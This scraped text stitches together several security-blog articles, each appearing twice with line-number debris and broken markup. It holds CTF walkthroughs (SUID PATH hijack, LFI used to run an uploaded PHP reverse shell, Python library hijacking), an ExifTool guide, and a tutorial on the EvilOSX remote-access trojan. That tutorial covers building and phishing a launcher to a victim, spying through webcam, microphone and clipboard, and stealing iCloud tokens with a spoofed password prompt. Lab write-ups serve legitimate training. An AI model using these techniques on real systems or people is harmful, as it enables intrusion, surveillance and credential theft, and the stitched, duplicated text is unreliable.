here.
Security Level: Beginner
Penetrating Methodology:
Scanning:
Then, as usual, we used our favourite tool Nmap for port scanning. We found that ssh is open and running two ports 22 and 65022.
[size=small]nmap -p- -A 192.168.1.102
1
nmap -p- -A 192.168.1.102[/size]
So our next step is to hunt the ssh username and password
Enumeration:
All we have got is ssh service enabled on the target machine and nothing else. So what we did is we started to capture traffic of the target machine using Wireshark.
We tried different filters and found something useful with UDP filter.
[size=small]ip.addr==192.168.1.102 && udp
1
ip.addr==192.168.1.102 && udp[/size]
We checked with UDP stream and two words got our attention whiteshark & whitepointer which could be the usernames for ssh.
In another captured data packet we found the password Ch@ndr!chthye$.
Exploitation:
So far we probably have got two usernames and one password.
We tried to ssh the target with both the usernames one by one but whitepointer & Ch@ndr!chthye$ combination worked for us and we were successfully able to login the target system.
After logging in we checked for sudo rights but the user was not a sudoer.
/usr/bin/root has suid set.
Privilege Escalation:
To elevate to the root shell we will exploit the suid permissions of the /usr/bin/root file. Using the strings command we found root file is actually running the whoami command.
We used the path variable methodology to exploit the privileges of the root file. What we did is we created a new file named whoami inside /tmp directory and put /bin/bash inside it using echo command, then gave all privileges to it. We then exported the path.
To know more about Path Variable check our article on the same HERE
So after that, once we executed the /usr/bin/root file we successfully got the root shell and then also the flag.txt as anticipated.
[size=small]cd /tmp
echo "/bin/bash" > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/root
cd /root
cat flag.txt
1
2
3
4
5
6
7
cd /tmp
echo "/bin/bash" > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/root
cd /root
cat flag.txt[/size]
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of FriendZone is 10.10.10.123
Penetration Testing Methodologies
Scanning
[size=small]nmap -sC -sV 10.10.10.123
1
nmap -sC -sV 10.10.10.123[/size]
From nmap scan we found so many ports are opened such as 22,53,80,443, 445 and several services were available and we noted the SSL certificate is registered as friendzone.red.
Enumeration
On exploring, vulnerable machine IP in the web browser, it welcomes us with following web page as shown below.
Here also I notice friendzone.red and this could be a clue for proceeding further. As per nmap scan result, port 53 is open for TCP which means there may be some possibilities for DNS Zone Transfer.
Consequently, I switch to another enumeration service and it was a null session SMB enumeration. So, with the help of SMBmap, which is a Linux utility, we try to enumerate smb shared directories.
[size=small]smbmap -H 10.10.10.123
1
smbmap -H 10.10.10.123
smbmap //10.10.10.123/general
ls
get creds.txt
1
2
3
smbmap //10.10.10.123/general
ls
get creds.txt[/size]
In this file, I found the following credential which could be used later.
[size=small]admin:WORKWORKHhallelujah@#
1
admin:WORKWORKHhallelujah@#[/size]
[size=small]host -l friendzone.red 10.10.10.123
1
host -l friendzone.red 10.10.10.123[/size]
On the exploring administrator1.friendzone.red we got a login portal where I submitted the credential that we have found above.
image_name param is missing
[size=small]https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp[/SIZE]
1
https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp[/SIZE][/size]
Exploiting LFI
As we knew that /Development is the only directory that has read/write both permissions, hence we can inject our malicious file inside this directory and execute the backdoor by exploiting LFI to obtain a reverse connection.
So, we connect to SMB with the help of smbclient and upload the php-reverse-shell inside /Development. Simultaneously we launched netcat listener in a new terminal to obtain a reverse connection from the host machine.
[size=small]smbclient //10.10.10.123/Development
1
smbclient //10.10.10.123/Development
Then execute the uploaded php backdoor with the privilege of LFI as shown below:
https://administrator1.friendzone.r...g&pagename=/etc/Development/php-reverse-shell
As soon as we executed above URL in the browser, we have access netcat session and to obtain proper shell we import python pty one-liner and found our 1st flag inside /home/friend.
user=friend
pass=Agpyu12!0.213$
Privilege Escalation
So, with the help of above-enumerated creds, we try to access ssh and luckily, we connected to ssh and try to identify weak permission file or role for escalating privileges to access root shell or root flag.
[size=small]ssh [email protected]
1
ssh [email protected]
As I failed to identify any sudo rights or SUID permission files, therefore I go for pspy64s to examine the running process of the machine. Thus, I downloaded the script it inside /tmp directory and gave full permissions.
On running pspy64s, we notice that a python is executing by root which was surprising to us.
So, I decided to take a look at what is script was doing, therefore I used the cat command to read what this script is running.
[size=small]cat /opt/server_admin/reporter.py
1
cat /opt/server_admin/reporter.py[/size]
Taking privilege of python library, we can create a bogus python library named as os.py to call root flag through this file.
[size=small]cd /tmp
echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py
1
2
cd /tmp
echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py[/size]
After some time it will create write the root flag inside /tmp/flag as shown in the below image. Thus, we have obtained the root flag and finished this challenge.
Table of Content
ExifTool is developed by Phil Harvey. It is a platform-independent Perl library coupled with a full-featured command-line implementation for reading, writing and manipulating the metadata across a broad range of files, particularly the JPEG images. This metadata may comprise a bunch of information such as the camera make, file type, permissions, file size etc., though it further offers more details about the photograph, like the exposure, the shutter speed and whether the flash fired or not. ExifTool probably gives us the simplest way to extract metadata from files, as it is free and an open-source program.
Installation
[size=small]git clone https://github.com/exiftool/exiftool.git[/SIZE]
1
git clone https://github.com/exiftool/exiftool.git[/SIZE][/size]
In addition, we need to install the necessary package for it.
[size=small]sudo apt-get install libimage-exiftool-perl
1
sudo apt-get install libimage-exiftool-perl
Usage of Exiftool
To extract the entire metadata of a file, we just need to execute the given below command:
However, if we need to capture the ids along with exif tags in the Hexa-Decimal format, though we need to run the following command:
[size=small]exiftool -H <filename>
1
exiftool -H <filename>
From the below image, we can see that there is a lot of information stored within these Exif tags.
Extract the Common Meta-Data Information
Now execute the given below command which will provide us with the output of the most common Exif tags of the image file.
Extract the Specific Meta-Data Information
We can list a particular meta-information of our image file by simply executing the command given:
From the below image, we get our desired output displayed along with their respected tag names in a list type format.
Extract GPS Co-ordinates
The photographs we capture using our smartphones or camera have GPS coordinates embedded as metadata in the image files. To obtain this, we just need to fire the command given below:
Here we got the GPS Position, now just copy and paste this complete coordinate information over Google Maps and we will get the exact location of the camera when the picture was taken.
Extract Thumbnail Image
Thumbnails are the original preview images basically compressed. These are just created to open the original images more quickly and act as place holders to them. In order to extract these thumbnail images, we just need to execute the following command:Here we can see that the thumbnail.jpg file is extracted from the test.jpg image.
Extract metadata using specific keywords
The following command will assist us to extract the metadata information associated with some specific keywords.
Verbose mode generates extended information i.e. when we add [-v] to the exiftool command it will display us the comprehensive data about the process that it is performing.
Writing the Meta-Data
To manipulate the exif data we need to execute the following command:
Removing Meta-Data Information
Saving outputs in Multiple Format
Here, we can see test.html file is generated. Although we just need to open it to check our EXIF data output in any of our browsers.
[size=small]exiftool (filename) > (outputexif.txt)
1
exiftool (filename) > (outputexif.txt)[/size]
Further, we can also monitor our output either by opening it in any of the text editors or by simply running the command:
[size=small]cat <filename>
1
cat <filename>[/size]
Extracting ExifData from a Video file
ExifTool not only extract metadata from the jpg file format but can also read and write in a variety of files. To know more click here.
[size=small]exiftool <filename.mp4>
1
exiftool <filename.mp4>[/size]
Conclusion
In this article, we will learn to use EvilOSX tool which is a Remote Administrator tool (RAT ) for initializing foothold on MacOS/OSX like platform. It can dramatically increase access in a matter of seconds.
Table of Content
EvilOSX is an evil RAT (Remote Administrator Tool) designed to work upon macOS / OSX Platforms. It was developed by Marten4n6. Its backbone is famous Empire Framework Project. This project can be modified to be used on Rubber Ducky. This toolkit is fully packed with features. It was designed on the module system that made the debugging, improvements and addition of other modules easy. Also being developed in python it provides easy to be run across different attacking platforms.
Installation
The installation of the EvilOSX RAT on the Attacker machine, which in our case in Kali Linux is pretty simple. To begin with, we will visit the EvilOSX GitHub Page. After getting the git link, we are going to clone the EvilOSX to our attacker machine using the git clone command.
[size=small]git clone https://github.com/Marten4n6/EvilOSX.git[/SIZE]
1
git clone https://github.com/Marten4n6/EvilOSX.git[/SIZE][/size]
[size=small]pip install -r requirements.txt
1
pip install -r requirements.txt
Usage in Exploitation
Since we have successfully installed all the predefined requirements, it time to run this tool and gain control over some macOS devices. Now to exploit, we need a payload. To create this payload, we will use the start.py file with the builder parameter.
[size=small]python start.py --builder
1
python start.py --builder
After running the script, it asked us to enter the following information:
After all these choices, a launcher is created as shown in the image given below.
Now we can use any method to share this launcher or payload to the victim. In our case, we used a python HTTP server to get this file to the victim system. This file is downloaded on the victim system and then after providing the proper permissions the payload is executed as shown in the image given below.
[size=small]chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py
1
2
chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py[/size]
While we are executing the Launcher on the victim, we have to perform some actions on the attacker machine simultaneously. We are going execute the start.py again but this time in the CLI mode. Here we have to specify the port that we used while creating the launcher as the parameter as shown in the image.
[size=small]python start.py -cli --port 4545
1
python start.py -cli --port 4545[/size]
Post-Exploitation
After running the start.py script in the previous steps simultaneously with the launcher on the victim machine, we have successfully infiltrated the Victim MacOS system. The terminal converts in a framework as shown in the image. We can configure a page to shown upon the running. Type in help to show a list of working commands. We can see the list of active bots by using the command bots. To establish a connection to a bot, use
System Info
To get a brief summary of the system, we can use the get info module. This gives us the System Version, Model of the MacOS device. We also get the Battery status in case it is a Laptop. We have the name of the Wi-Fi network it is connected to. It also tells us the privileges the current account has as well as the status of the FileVault.
Webcam
Now, we will try to grab a snap from the webcam of the MacOS device. To do this we will need to use the webcam module. It gives us a warning that there a green LED will show near the camera.
Retrieve iCloud auth tokens
We can extract the iCloud Authentication that contains information related to the AppleID linked to the device. However, this will first show a prompt on the victim system.
After agreeing to continue, a prompt will pop us as shown in the image given below. This is masquerading as a genuine prompt that will spoof the victim and make him enter the password.
After the victim enters a password, we will successfully capture the mail ID liked to the device as well as the access tokens as shown in the image given below.
Microphone
Here we entered 5 seconds, and we left the name of service to be blanked which made the RAT to take it as random string as shown in the given image. A permission prompt pops up on the victim system asking for permission to access the microphone.
After allowing we have the recorded audio in the mp3 format saved on out attacker machine in the tmp directory.
Clipboard
We can also sniff the clipboard data from the victim machine. To do this we will have to use the clipboard. This will start the sniffer on the victim machine for the specified time in seconds. After starting the sniffer, any text that the victim will copy can be viewed as shown in the image given below.
Security Level: Beginner
Penetrating Methodology:
- Scanning
- NMAP
- Enumeration
- Wireshark
- Exploitation
- SSH
- Privilege Escalation
- Exploiting Suid rights
Scanning:
Then, as usual, we used our favourite tool Nmap for port scanning. We found that ssh is open and running two ports 22 and 65022.
[size=small]nmap -p- -A 192.168.1.102
1
nmap -p- -A 192.168.1.102[/size]
So our next step is to hunt the ssh username and password
Enumeration:
All we have got is ssh service enabled on the target machine and nothing else. So what we did is we started to capture traffic of the target machine using Wireshark.
We tried different filters and found something useful with UDP filter.
[size=small]ip.addr==192.168.1.102 && udp
1
ip.addr==192.168.1.102 && udp[/size]
We checked with UDP stream and two words got our attention whiteshark & whitepointer which could be the usernames for ssh.
In another captured data packet we found the password Ch@ndr!chthye$.
Exploitation:
So far we probably have got two usernames and one password.
We tried to ssh the target with both the usernames one by one but whitepointer & Ch@ndr!chthye$ combination worked for us and we were successfully able to login the target system.
After logging in we checked for sudo rights but the user was not a sudoer.
/usr/bin/root has suid set.
Privilege Escalation:
To elevate to the root shell we will exploit the suid permissions of the /usr/bin/root file. Using the strings command we found root file is actually running the whoami command.
We used the path variable methodology to exploit the privileges of the root file. What we did is we created a new file named whoami inside /tmp directory and put /bin/bash inside it using echo command, then gave all privileges to it. We then exported the path.
To know more about Path Variable check our article on the same HERE
So after that, once we executed the /usr/bin/root file we successfully got the root shell and then also the flag.txt as anticipated.
[size=small]cd /tmp
echo "/bin/bash" > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/root
cd /root
cat flag.txt
1
2
3
4
5
6
7
cd /tmp
echo "/bin/bash" > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/root
cd /root
cat flag.txt[/size]
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of FriendZone is 10.10.10.123
Penetration Testing Methodologies
Scanning
- Nmap
- SMB shared Directory
- DNS Zone Transfer
- MySQL creds
- LFI to RCE
- Capture the user flag
- Abusing Python Library
- Capture the root flag
[size=small]nmap -sC -sV 10.10.10.123
1
nmap -sC -sV 10.10.10.123[/size]
From nmap scan we found so many ports are opened such as 22,53,80,443, 445 and several services were available and we noted the SSL certificate is registered as friendzone.red.
Enumeration
On exploring, vulnerable machine IP in the web browser, it welcomes us with following web page as shown below.
Here also I notice friendzone.red and this could be a clue for proceeding further. As per nmap scan result, port 53 is open for TCP which means there may be some possibilities for DNS Zone Transfer.
Consequently, I switch to another enumeration service and it was a null session SMB enumeration. So, with the help of SMBmap, which is a Linux utility, we try to enumerate smb shared directories.
[size=small]smbmap -H 10.10.10.123
1
smbmap -H 10.10.10.123
smbmap //10.10.10.123/general
ls
get creds.txt
1
2
3
smbmap //10.10.10.123/general
ls
get creds.txt[/size]
In this file, I found the following credential which could be used later.
[size=small]admin:WORKWORKHhallelujah@#
1
admin:WORKWORKHhallelujah@#[/size]
[size=small]host -l friendzone.red 10.10.10.123
1
host -l friendzone.red 10.10.10.123[/size]
On the exploring administrator1.friendzone.red we got a login portal where I submitted the credential that we have found above.
image_name param is missing
[size=small]https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp[/SIZE]
1
https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp[/SIZE][/size]
Exploiting LFI
As we knew that /Development is the only directory that has read/write both permissions, hence we can inject our malicious file inside this directory and execute the backdoor by exploiting LFI to obtain a reverse connection.
So, we connect to SMB with the help of smbclient and upload the php-reverse-shell inside /Development. Simultaneously we launched netcat listener in a new terminal to obtain a reverse connection from the host machine.
[size=small]smbclient //10.10.10.123/Development
1
smbclient //10.10.10.123/Development
Then execute the uploaded php backdoor with the privilege of LFI as shown below:
https://administrator1.friendzone.r...g&pagename=/etc/Development/php-reverse-shell
As soon as we executed above URL in the browser, we have access netcat session and to obtain proper shell we import python pty one-liner and found our 1st flag inside /home/friend.
user=friend
pass=Agpyu12!0.213$
Privilege Escalation
So, with the help of above-enumerated creds, we try to access ssh and luckily, we connected to ssh and try to identify weak permission file or role for escalating privileges to access root shell or root flag.
[size=small]ssh [email protected]
1
ssh [email protected]
As I failed to identify any sudo rights or SUID permission files, therefore I go for pspy64s to examine the running process of the machine. Thus, I downloaded the script it inside /tmp directory and gave full permissions.
On running pspy64s, we notice that a python is executing by root which was surprising to us.
So, I decided to take a look at what is script was doing, therefore I used the cat command to read what this script is running.
[size=small]cat /opt/server_admin/reporter.py
1
cat /opt/server_admin/reporter.py[/size]
Taking privilege of python library, we can create a bogus python library named as os.py to call root flag through this file.
[size=small]cd /tmp
echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py
1
2
cd /tmp
echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py[/size]
After some time it will create write the root flag inside /tmp/flag as shown in the below image. Thus, we have obtained the root flag and finished this challenge.
Table of Content
- Introduction to ExifTool
- Installation
- Usage of ExifTool
- Extract the Common Meta-Data Information
- Extract the Specific Meta-Data Information
- Extract GPS Co-ordinates
- Extract Thumbnail Image
- Extract metadata using specific keywords
- Writing the Meta-Data Information
- Removing Meta-Data Information
- Saving outputs
- In HTML file
- In-Text File
- Extracting EXIF data from a Video file
ExifTool is developed by Phil Harvey. It is a platform-independent Perl library coupled with a full-featured command-line implementation for reading, writing and manipulating the metadata across a broad range of files, particularly the JPEG images. This metadata may comprise a bunch of information such as the camera make, file type, permissions, file size etc., though it further offers more details about the photograph, like the exposure, the shutter speed and whether the flash fired or not. ExifTool probably gives us the simplest way to extract metadata from files, as it is free and an open-source program.
Installation
[size=small]git clone https://github.com/exiftool/exiftool.git[/SIZE]
1
git clone https://github.com/exiftool/exiftool.git[/SIZE][/size]
In addition, we need to install the necessary package for it.
[size=small]sudo apt-get install libimage-exiftool-perl
1
sudo apt-get install libimage-exiftool-perl
Usage of Exiftool
To extract the entire metadata of a file, we just need to execute the given below command:
However, if we need to capture the ids along with exif tags in the Hexa-Decimal format, though we need to run the following command:
[size=small]exiftool -H <filename>
1
exiftool -H <filename>
From the below image, we can see that there is a lot of information stored within these Exif tags.
Extract the Common Meta-Data Information
Now execute the given below command which will provide us with the output of the most common Exif tags of the image file.
Extract the Specific Meta-Data Information
We can list a particular meta-information of our image file by simply executing the command given:
From the below image, we get our desired output displayed along with their respected tag names in a list type format.
Extract GPS Co-ordinates
The photographs we capture using our smartphones or camera have GPS coordinates embedded as metadata in the image files. To obtain this, we just need to fire the command given below:
Here we got the GPS Position, now just copy and paste this complete coordinate information over Google Maps and we will get the exact location of the camera when the picture was taken.
Extract Thumbnail Image
Thumbnails are the original preview images basically compressed. These are just created to open the original images more quickly and act as place holders to them. In order to extract these thumbnail images, we just need to execute the following command:Here we can see that the thumbnail.jpg file is extracted from the test.jpg image.
Extract metadata using specific keywords
The following command will assist us to extract the metadata information associated with some specific keywords.
Verbose mode generates extended information i.e. when we add [-v] to the exiftool command it will display us the comprehensive data about the process that it is performing.
Writing the Meta-Data
To manipulate the exif data we need to execute the following command:
Removing Meta-Data Information
Saving outputs in Multiple Format
- In HTML file
Here, we can see test.html file is generated. Although we just need to open it to check our EXIF data output in any of our browsers.
- In-Text File
[size=small]exiftool (filename) > (outputexif.txt)
1
exiftool (filename) > (outputexif.txt)[/size]
Further, we can also monitor our output either by opening it in any of the text editors or by simply running the command:
[size=small]cat <filename>
1
cat <filename>[/size]
Extracting ExifData from a Video file
ExifTool not only extract metadata from the jpg file format but can also read and write in a variety of files. To know more click here.
[size=small]exiftool <filename.mp4>
1
exiftool <filename.mp4>[/size]
Conclusion
In this article, we will learn to use EvilOSX tool which is a Remote Administrator tool (RAT ) for initializing foothold on MacOS/OSX like platform. It can dramatically increase access in a matter of seconds.
Table of Content
- Introduction
- Installation
- Usage in Exploitation
- Usage in Post-Exploitation
- System Info
- Webcam
- Retrieve iCloud auth tokens
- Microphone
- Clipboard
- Conclusion
EvilOSX is an evil RAT (Remote Administrator Tool) designed to work upon macOS / OSX Platforms. It was developed by Marten4n6. Its backbone is famous Empire Framework Project. This project can be modified to be used on Rubber Ducky. This toolkit is fully packed with features. It was designed on the module system that made the debugging, improvements and addition of other modules easy. Also being developed in python it provides easy to be run across different attacking platforms.
Installation
The installation of the EvilOSX RAT on the Attacker machine, which in our case in Kali Linux is pretty simple. To begin with, we will visit the EvilOSX GitHub Page. After getting the git link, we are going to clone the EvilOSX to our attacker machine using the git clone command.
[size=small]git clone https://github.com/Marten4n6/EvilOSX.git[/SIZE]
1
git clone https://github.com/Marten4n6/EvilOSX.git[/SIZE][/size]
[size=small]pip install -r requirements.txt
1
pip install -r requirements.txt
Usage in Exploitation
Since we have successfully installed all the predefined requirements, it time to run this tool and gain control over some macOS devices. Now to exploit, we need a payload. To create this payload, we will use the start.py file with the builder parameter.
[size=small]python start.py --builder
1
python start.py --builder
After running the script, it asked us to enter the following information:
- the Server host, here we entered our Attacker Machine IP Address (Kali Linux).
- Next, it asked us for a port, this can be any random port.
- After this, we are asked for the location of the payload.
- Next, we have to choose if we want EvilOSX to work upon the rubber ducky or not. Enter 0 for otherwise.
- Furthermore, we are asked to choose the loader, leave it default.
- After that, we are asked to name the payload so as phish the user.
After all these choices, a launcher is created as shown in the image given below.
Now we can use any method to share this launcher or payload to the victim. In our case, we used a python HTTP server to get this file to the victim system. This file is downloaded on the victim system and then after providing the proper permissions the payload is executed as shown in the image given below.
[size=small]chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py
1
2
chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py[/size]
While we are executing the Launcher on the victim, we have to perform some actions on the attacker machine simultaneously. We are going execute the start.py again but this time in the CLI mode. Here we have to specify the port that we used while creating the launcher as the parameter as shown in the image.
[size=small]python start.py -cli --port 4545
1
python start.py -cli --port 4545[/size]
Post-Exploitation
After running the start.py script in the previous steps simultaneously with the launcher on the victim machine, we have successfully infiltrated the Victim MacOS system. The terminal converts in a framework as shown in the image. We can configure a page to shown upon the running. Type in help to show a list of working commands. We can see the list of active bots by using the command bots. To establish a connection to a bot, use
System Info
To get a brief summary of the system, we can use the get info module. This gives us the System Version, Model of the MacOS device. We also get the Battery status in case it is a Laptop. We have the name of the Wi-Fi network it is connected to. It also tells us the privileges the current account has as well as the status of the FileVault.
Webcam
Now, we will try to grab a snap from the webcam of the MacOS device. To do this we will need to use the webcam module. It gives us a warning that there a green LED will show near the camera.
Retrieve iCloud auth tokens
We can extract the iCloud Authentication that contains information related to the AppleID linked to the device. However, this will first show a prompt on the victim system.
After agreeing to continue, a prompt will pop us as shown in the image given below. This is masquerading as a genuine prompt that will spoof the victim and make him enter the password.
After the victim enters a password, we will successfully capture the mail ID liked to the device as well as the access tokens as shown in the image given below.
Microphone
Here we entered 5 seconds, and we left the name of service to be blanked which made the RAT to take it as random string as shown in the given image. A permission prompt pops up on the victim system asking for permission to access the microphone.
After allowing we have the recorded audio in the mp3 format saved on out attacker machine in the tmp directory.
Clipboard
We can also sniff the clipboard data from the victim machine. To do this we will have to use the clipboard. This will start the sniffer on the victim machine for the specified time in seconds. After starting the sniffer, any text that the victim will copy can be viewed as shown in the image given below.